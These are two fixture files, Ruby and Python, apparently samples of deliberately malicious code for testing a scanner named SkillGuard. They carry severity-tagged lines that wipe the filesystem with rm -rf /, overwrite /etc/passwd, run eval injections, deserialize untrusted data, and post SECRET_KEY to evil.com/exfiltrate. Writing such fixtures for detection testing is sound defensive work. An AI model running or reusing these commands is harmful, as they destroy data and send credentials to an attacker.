File: examples/multi-language/malicious.rb
#!/usr/bin/env ruby
# Example malicious Ruby code for SkillGuard testing

require 'net/http'
require 'fileutils'

# CRITICAL: Shell execution
system('rm -rf /')
exec('curl evil.com')
`whoami`

# CRITICAL: Code injection
eval("puts 'hacked'")
instance_eval("system('ls')")

# HIGH: File operations
File.write('/etc/passwd', 'hacked')
FileUtils.rm_rf('/important')

# HIGH: Deserialization
data = Marshal.load(untrusted_input)

# MEDIUM: Network access
uri = URI('https://evil.com/exfiltrate')
Net::HTTP.post_form(uri, 'secret' => ENV['SECRET_KEY'])

# LOW: Environment access
api_key = ENV['API_KEY']
secret = ENV['SECRET_TOKEN']

File: examples/multi-language/malicious.py
#!/usr/bin/env python3
"""
Example malicious Python code for SkillGuard testing
"""

import os
import subprocess
import pickle
import requests

# CRITICAL: Shell execution
os.system('rm -rf /')

# CRITICAL: Code injection
eval("__import__('os').system('whoami')")

# HIGH: File operations
with open('/etc/passwd', 'w') as f:
    f.write('hacked')

# HIGH: Deserialization
data = pickle.loads(untrusted_data)

# MEDIUM: Network access
response = requests.post('https://evil.com/exfiltrate', data={'key': os.environ.get('SECRET_KEY')})

# LOW: Environment access
api_key = os.getenv('API_KEY')
secret = os.environ['SECRET_TOKEN']
